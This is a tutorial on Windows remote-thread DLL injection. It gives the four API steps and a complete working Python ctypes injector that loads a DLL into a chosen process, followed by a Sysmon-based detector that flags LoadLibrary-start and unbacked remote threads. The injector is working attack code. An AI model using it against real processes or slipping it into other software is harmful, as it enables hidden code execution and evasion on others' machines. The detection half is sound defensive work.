- Nowadays it is rare to see remote threading used to inject dynamic libraries or shellcode in practice, but it is the classic injection method for learning how injection works.
- Implementation process
  a. Obtain a handle to the target process from its process ID (OpenProcess).
  b. Get the address of the LoadLibrary() function in Kernel32.dll.
  c. Allocate memory in the target process and write the dynamic library's path into it (this buffer becomes the parameter of LoadLibrary).
  d. Call CreateRemoteThread() to create a remote thread that starts at LoadLibrary with that buffer as its argument:
  CreateRemoteThread(process_handle, None, 0, loadlibrary_addr, dll_path_addr, 0, byref(thread_id))
- Code implementation

```python
# -*- coding: utf-8 -*-
from ctypes import *
import ctypes
import os
import sys


def inject_dll(pid, dll_path):
    PAGE_READWRITE = 0x04
    PROCESS_ALL_ACCESS = (0x000F0000 | 0x00100000 | 0xFFF)
    VIRTUAL_MEM = (0x1000 | 0x2000)  # MEM_COMMIT | MEM_RESERVE
    kernel32 = windll.kernel32
    # ctypes defaults every return value to a 32-bit int; declare pointer-sized
    # results so handles and addresses are not truncated on x64.
    for fn in (kernel32.OpenProcess, kernel32.VirtualAllocEx, kernel32.GetModuleHandleA,
               kernel32.GetProcAddress, kernel32.CreateRemoteThread):
        fn.restype = c_void_p

    print("[+] Starting DLL injector")
    dll_path = dll_path.encode("mbcs") + b"\x00"  # LoadLibraryA expects a NUL-terminated ANSI string
    dll_length = len(dll_path)
    print("[+] Getting process handle from process ID %d" % pid)
    # a. open a handle to the target process
    process_handle = kernel32.OpenProcess(PROCESS_ALL_ACCESS, False, pid)
    if not process_handle:
        print("Unable to get process handle")
        sys.exit(0)

    print("[+] Allocating buffer space in target process")
    # c. reserve memory in the target's virtual address space to hold the DLL path
    dll_path_addr = kernel32.VirtualAllocEx(c_void_p(process_handle), None, dll_length,
                                            VIRTUAL_MEM, PAGE_READWRITE)
    bytes_written = c_size_t(0)
    print("[+] Writing DLL path to target process space")
    # write the DLL path into the target process; it becomes LoadLibraryA's argument
    kernel32.WriteProcessMemory(c_void_p(process_handle), c_void_p(dll_path_addr), dll_path,
                                dll_length, byref(bytes_written))

    # b. resolve LoadLibraryA in kernel32.dll (kernel32 is mapped at the same
    #    base in every process, so the local address is valid in the target)
    print("\t[+] Resolving call-specific function & library")
    kernel32_handle = kernel32.GetModuleHandleA(b"kernel32.dll")
    loadlibrary_addr = kernel32.GetProcAddress(c_void_p(kernel32_handle), b"LoadLibraryA")

    # d. start a remote thread at LoadLibraryA with the path buffer as its parameter
    thread_id = c_ulong(0)
    thread_handle = kernel32.CreateRemoteThread(c_void_p(process_handle), None, 0,
                                                c_void_p(loadlibrary_addr), c_void_p(dll_path_addr),
                                                0, byref(thread_id))
    if not thread_handle:
        print("Injection failed, exiting")
        sys.exit(0)
    print("Remote thread ID %d" % thread_id.value)


if __name__ == "__main__":
    pid = int(input("Enter the process ID: "))
    # pick the DLL matching the interpreter's bitness (pointer size 4 -> x86)
    if ctypes.sizeof(ctypes.c_voidp) == 4:
        print("Running on an x86 machine, selecting DLL")
        dll_path = os.path.abspath("Vminjector32.dll")
    else:
        print("Running on an x64 machine, selecting DLL")
        dll_path = os.path.abspath("Vminjector64.dll")
    print("Configured DLL path to %s\n" % dll_path)
    inject_dll(pid, dll_path)
```
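The defender's counterpart to steps a-d above, as an added example that is not part of the original page: the recipe leaves a distinctive trace, a thread created in another process whose start address is LoadLibrary inside kernel32.dll (or, for shellcode, an address backed by no module at all). The code below classifies Sysmon-style CreateRemoteThread (Event ID 8) records on that basis. The field names follow Sysmon's event (SourceImage, SourceProcessId, TargetImage, TargetProcessId, StartModule, StartFunction); the `Key: Value|Key: Value` line layout, the log lines themselves and the `BENIGN_SOURCE_IMAGES` allow-list are constructed for this example.

```python
from dataclasses import dataclass
from typing import List, Tuple

# LoadLibrary entry points a remote thread starts at when an injector follows the
# OpenProcess -> VirtualAllocEx -> WriteProcessMemory -> CreateRemoteThread recipe.
LOADLIBRARY_FUNCS = {"LoadLibraryA", "LoadLibraryW", "LoadLibraryExA", "LoadLibraryExW"}

# Assumption for this example: images allowed to create cross-process threads
# (lower-cased); tune per environment.
BENIGN_SOURCE_IMAGES = {r"c:\windows\system32\csrss.exe"}

# Constructed Sysmon-style Event ID 8 records, one per line.
SAMPLE_LOG = r"""
SourceImage: C:\Tools\injector.exe|SourceProcessId: 4120|TargetImage: C:\Windows\System32\notepad.exe|TargetProcessId: 5320|StartModule: C:\Windows\System32\KERNEL32.DLL|StartFunction: LoadLibraryA
SourceImage: C:\Windows\System32\csrss.exe|SourceProcessId: 612|TargetImage: C:\Windows\explorer.exe|TargetProcessId: 3380|StartModule: C:\Windows\System32\ntdll.dll|StartFunction: RtlUserThreadStart
SourceImage: C:\Users\alice\dropper.exe|SourceProcessId: 7001|TargetImage: C:\Windows\explorer.exe|TargetProcessId: 3380|StartModule: -|StartFunction: -
"""


@dataclass
class RemoteThreadEvent:
    source_image: str
    source_pid: int
    target_image: str
    target_pid: int
    start_module: str    # "" when no loaded module backs the start address
    start_function: str  # "" when no exported symbol matches the start address


def parse_event(line: str) -> RemoteThreadEvent:
    """Parse one 'Key: Value|Key: Value' record (constructed layout) into an event."""
    fields = {}
    for part in line.strip().split("|"):
        key, _, value = part.partition(":")  # first colon separates key from value
        fields[key.strip()] = value.strip()

    def clean(v: str) -> str:
        return "" if v in ("", "-") else v  # Sysmon prints "-" for an unbacked start

    return RemoteThreadEvent(
        source_image=fields["SourceImage"],
        source_pid=int(fields["SourceProcessId"]),
        target_image=fields["TargetImage"],
        target_pid=int(fields["TargetProcessId"]),
        start_module=clean(fields.get("StartModule", "")),
        start_function=clean(fields.get("StartFunction", "")),
    )


def classify(ev: RemoteThreadEvent) -> str:
    """Map one remote-thread event to a triage verdict."""
    if ev.source_pid == ev.target_pid:
        return "local-thread"          # not cross-process, out of scope
    if ev.source_image.lower() in BENIGN_SOURCE_IMAGES:
        return "benign-source"         # allow-listed creator of remote threads
    if ev.start_function in LOADLIBRARY_FUNCS and ev.start_module.lower().endswith("kernel32.dll"):
        return "dll-injection"         # exactly the LoadLibrary-as-thread-start pattern
    if not ev.start_module:
        return "unbacked-start"        # thread starts outside any module: shellcode-style
    return "review"                    # cross-process thread with a less specific start


def scan(log_text: str) -> List[Tuple[int, int, str]]:
    """Return (source_pid, target_pid, verdict) for every non-empty record."""
    results = []
    for line in log_text.splitlines():
        if line.strip():
            ev = parse_event(line)
            results.append((ev.source_pid, ev.target_pid, classify(ev)))
    return results


if __name__ == "__main__":
    for src, dst, verdict in scan(SAMPLE_LOG):
        print(f"{src} -> {dst}: {verdict}")
```

The "dll-injection" branch keys on the pairing of StartModule and StartFunction rather than on the source image name, because the injector binary is arbitrary while the LoadLibrary start address is inherent to the technique; the allow-list is checked first so that legitimate system components that create remote threads do not swamp the alert.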
Dynamic Library injection-remote threading